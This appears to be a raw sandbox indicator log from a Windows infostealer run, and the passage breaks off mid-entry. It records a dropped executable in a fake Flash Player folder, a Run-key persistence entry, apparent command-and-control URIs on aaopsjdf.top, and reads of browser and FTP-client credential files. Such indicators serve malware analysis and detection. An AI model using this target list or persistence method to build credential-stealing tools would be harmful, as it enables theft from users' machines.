\??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex 4786CF0F1E6E9E20640CE4A22DFFC997 Mutex 35D65C8FBCA06952705002450D6712FC Mutex 9B4D68961731FE3C22DA08B640799EB6 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\local\temp\upde25b4796.exe users\aetadzjz\appdata\local\temp\upde25b4796.exe c:\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe exe MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig rig Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex A354992B05F4DA0EB1B4AB788E3CE988 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex 61AB4C4AE08220DC5911D67B8EFCF107 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex F063546A5853AF5508DB5A15751DB34A Mutex F063546A5853AF5508DB5A15751DB34A WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna SocketAddress www.google.com 443 NetworkConnection HTTP www.google.com 443 URI aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg Contains URI www.google.com/ Contains URI aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/ Contains URI aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw Contains URI aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/ Contains URI aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A Contains URI aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/ Contains URI aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA Contains URI aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q Contains URI aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g Contains URI aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew Contains URI aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw Contains URI aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA Contains File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe WinRegistryKey Software\Microsoft\Windows\Currentversion\Run HKEY_CURRENT_USER roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg File Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe exe File \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89 File users\aetadzjz\appdata\local\temp\upde25b4796.exe users\aetadzjz\appdata\local\temp\upde25b4796.exe c:\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming users\aetadzjz\appdata\roaming c:\ c:\users\aetadzjz\appdata\roaming File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys com\support\flashplayer\sys File users\aetadzjz\appdata\local\temp\upd9dba1b78.bat users\aetadzjz\appdata\local\temp\upd9dba1b78.bat c:\ c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat bat MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex E58EFF540968A436E982FCFA1C0445A2 File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex A63A6CDA308CF3B4F10C6B82D6B9EA5B Mutex 629BC138D148FEC80DAF76D454EF252E WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna File users\aetadzjz\appdata\local\temp\upd9dba1b78.bat users\aetadzjz\appdata\local\temp\upd9dba1b78.bat c:\ c:\users\aetadzjz\appdata\local\temp\upd9dba1b78.bat bat File STD_INPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File users\aetadzjz\appdata\local\temp\upde25b4796.exe users\aetadzjz\appdata\local\temp\upde25b4796.exe c:\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin Copied_From File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copied_To File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles.ini users\aetadzjz\appdata\roaming\mozilla\firefox\profiles.ini c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles.ini ini File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\addons.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\addons.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\addons.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cert8.db users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cert8.db c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cert8.db db File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\compatibility.ini users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\compatibility.ini c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\compatibility.ini ini File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\content-prefs.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\content-prefs.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\content-prefs.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cookies.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cookies.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\cookies.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\downloads.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\downloads.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\downloads.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.ini users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.ini c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.ini ini File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\extensions.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\formhistory.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\formhistory.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\formhistory.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\healthreport.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\.metadata users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\.metadata c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\.metadata metadata File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\indexeddb\moz-safe-about+home\idb\818200132aebmoouht.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\key3.db users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\key3.db c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\key3.db db File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\localstore.rdf users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\localstore.rdf c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\localstore.rdf rdf File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\marionette.log users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\marionette.log c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\marionette.log log File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\mimetypes.rdf users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\mimetypes.rdf c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\mimetypes.rdf rdf File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\parent.lock users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\parent.lock c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\parent.lock lock File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\permissions.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\permissions.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\permissions.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\places.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\places.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\places.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\pluginreg.dat users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\pluginreg.dat c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\pluginreg.dat dat File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js js File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\search.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\search.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\search.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\secmod.db users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\secmod.db c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\secmod.db db File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.bak users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.bak c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.bak bak File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.js users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.js c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.js js File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\signons.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\signons.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\signons.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\times.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\times.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\times.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\urlclassifierkey3.txt users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\urlclassifierkey3.txt c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\urlclassifierkey3.txt txt File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webapps\webapps.json users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webapps\webapps.json c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webapps\webapps.json json File users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webappsstore.sqlite users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webappsstore.sqlite c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webappsstore.sqlite sqlite File users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332 users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332 c:\ c:\users\aetadzjz\appdata\roaming\mozilla\firefox\crash reports\installtime20131025151332 File users\aetadzjz\appdata\local\google\chrome\user data\default\web data users\aetadzjz\appdata\local\google\chrome\user data\default\web data c:\ c:\users\aetadzjz\appdata\local\google\chrome\user data\default\web data File users\aetadzjz\appdata\local\google\chrome\user data\default\web data-journal users\aetadzjz\appdata\local\google\chrome\user data\default\web data-journal c:\ c:\users\aetadzjz\appdata\local\google\chrome\user data\default\web data-journal File users\aetadzjz\appdata\local\google\chrome\user data\default\login data users\aetadzjz\appdata\local\google\chrome\user data\default\login data c:\ c:\users\aetadzjz\appdata\local\google\chrome\user data\default\login data File users\aetadzjz\appdata\local\google\chrome\user data\default\login data-journal users\aetadzjz\appdata\local\google\chrome\user data\default\login data-journal c:\ c:\users\aetadzjz\appdata\local\google\chrome\user data\default\login data-journal File windows\wcx_ftp.ini windows\wcx_ftp.ini c:\ c:\windows\wcx_ftp.ini ini File users\aetadzjz\appdata\local\virtualstore\windows\wcx_ftp.ini users\aetadzjz\appdata\local\virtualstore\windows\wcx_ftp.ini c:\ c:\users\aetadzjz\appdata\local\virtualstore\windows\wcx_ftp.ini ini File users\aetadzjz\wcx_ftp.ini users\aetadzjz\wcx_ftp.ini c:\ c:\users\aetadzjz\wcx_ftp.ini ini File users\aetadzjz\appdata\roaming\ghisler\wcx_ftp.ini users\aetadzjz\appdata\roaming\ghisler\wcx_ftp.ini c:\ c:\users\aetadzjz\appdata\roaming\ghisler\wcx_ftp.ini ini File programdata\ghisler\wcx_ftp.ini programdata\ghisler\wcx_ftp.ini c:\ c:\programdata\ghisler\wcx_ftp.ini ini File users\aetadzjz\appdata\local\ghisler\wcx_ftp.ini users\aetadzjz\appdata\local\ghisler\wcx_ftp.ini c:\ c:\users\aetadzjz\appdata\local\ghisler\wcx_ftp.ini ini File users\aetadzjz\appdata\roaming\filezilla\sitemanager.xml users\aetadzjz\appdata\roaming\filezilla\sitemanager.xml c:\ c:\users\aetadzjz\appdata\roaming\filezilla\sitemanager.xml xml File users\aetadzjz\appdata\roaming\filezilla\recentservers.xml users\aetadzjz\appdata\roaming\filezilla\recentservers.xml c:\ c:\users\aetadzjz\appdata\roaming\filezilla\recentservers.xml xml File users\aetadzjz\appdata\roaming\filezilla\filezilla.xml users\aetadzjz\appdata\roaming\filezilla\filezilla.xml c:\ c:\users\aetadzjz\appdata\roaming\filezilla\filezilla.xml xml File programdata\filezilla\sitemanager.xml programdata\filezilla\sitemanager.xml c:\ c:\programdata\filezilla\sitemanager.xml xml File programdata\filezilla\recentservers.xml programdata\filezilla\recentservers.xml c:\ c:\programdata\filezilla\recentservers.xml xml File programdata\filezilla\filezilla.xml programdata\filezilla\filezilla.xml c:\ c:\programdata\filezilla\filezilla.xml xml File users\aetadzjz\appdata\local\filezilla\sitemanager.xml users\aetadzjz\appdata\local\filezilla\sitemanager.xml c:\ c:\users\aetadzjz\appdata\local\filezilla\sitemanager.xml xml File users\aetadzjz\appdata\local\filezilla\recentservers.xml users\aetadzjz\appdata\local\filezilla\recentservers.xml c:\ c:\users\aetadzjz\appdata\local\filezilla\recentservers.xml xml File users\aetadzjz\appdata\local\filezilla\filezilla.xml users\aetadzjz\appdata\local\filezilla\filezilla.xml c:\ c:\users\aetadzjz\appdata\local\filezilla\filezilla.xml xml File users\aetadzjz\appdata\roaming\globalscape\cuteftp\sm.dat users\aetadzjz\appdata\roaming\globalscape\cuteftp\sm.dat c:\ c:\users\aetadzjz\appdata\roaming\globalscape\cuteftp\sm.dat dat File users\aetadzjz\appdata\roaming\globalscape\cuteftp pro\sm.dat users\aetadzjz\appdata\roaming\globalscape\cuteftp pro\sm.dat c:\ c:\users\aetadzjz\appdata\roaming\globalscape\cuteftp pro\sm.dat dat File users\aetadzjz\appdata\roaming\globalscape\cuteftp lite\sm.dat users\aetadzjz\appdata\roaming\globalscape\cuteftp lite\sm.dat c:\ c:\users\aetadzjz\appdata\roaming\globalscape\cuteftp lite\sm.dat dat File users\aetadzjz\appdata\roaming\cuteftp\sm.dat users\aetadzjz\appdata\roaming\cuteftp\sm.dat c:\ c:\users\aetadzjz\appdata\roaming\cuteftp\sm.dat dat File programdata\globalscape\cuteftp\sm.dat programdata\globalscape\cuteftp\sm.dat c:\ c:\programdata\globalscape\cuteftp\sm.dat dat File programdata\globalscape\cuteftp pro\sm.dat programdata\globalscape\cuteftp pro\sm.dat c:\ c:\programdata\globalscape\cuteftp pro\sm.dat dat File programdata\globalscape\cuteftp lite\sm.dat programdata\globalscape\cuteftp lite\sm.dat c:\ c:\programdata\globalscape\cuteftp lite\sm.dat dat File programdata\cuteftp\sm.dat programdata\cuteftp\sm.dat c:\ c:\programdata\cuteftp\sm.dat dat File users\aetadzjz\appdata\local\globalscape\cuteftp\sm.dat users\aetadzjz\appdata\local\globalscape\cuteftp\sm.dat c:\ c:\users\aetadzjz\appdata\local\globalscape\cuteftp\sm.dat dat File users\aetadzjz\appdata\local\globalscape\cuteftp pro\sm.dat users\aetadzjz\appdata\local\globalscape\cuteftp pro\sm.dat c:\ c:\users\aetadzjz\appdata\local\globalscape\cuteftp pro\sm.dat dat File users\aetadzjz\appdata\local\globalscape\cuteftp lite\sm.dat users\aetadzjz\appdata\local\globalscape\cuteftp lite\sm.dat c:\ c:\users\aetadzjz\appdata\local\globalscape\cuteftp lite\sm.dat dat File users\aetadzjz\appdata\local\cuteftp\sm.dat users\aetadzjz\appdata\local\cuteftp\sm.dat c:\ c:\users\aetadzjz\appdata\local\cuteftp\sm.dat dat File program files (x86)\globalscape\cuteftp\sm.dat program files (x86)\globalscape\cuteftp\sm.dat c:\ c:\program files (x86)\globalscape\cuteftp\sm.dat dat File program files (x86)\globalscape\cuteftp pro\sm.dat program files (x86)\globalscape\cuteftp pro\sm.dat c:\ c:\program files (x86)\globalscape\cuteftp pro\sm.dat dat File program files (x86)\globalscape\cuteftp lite\sm.dat program files (x86)\globalscape\cuteftp lite\sm.dat c:\ c:\program files (x86)\globalscape\cuteftp lite\sm.dat dat File program files (x86)\cuteftp\sm.dat program files (x86)\cuteftp\sm.dat c:\ c:\program files (x86)\cuteftp\sm.dat dat File users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@g.live[1].txt users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@g.live[1].txt c:\ c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@g.live[1].txt txt File users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt c:\ c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt txt File users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@live[1].txt users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@live[1].txt c:\ 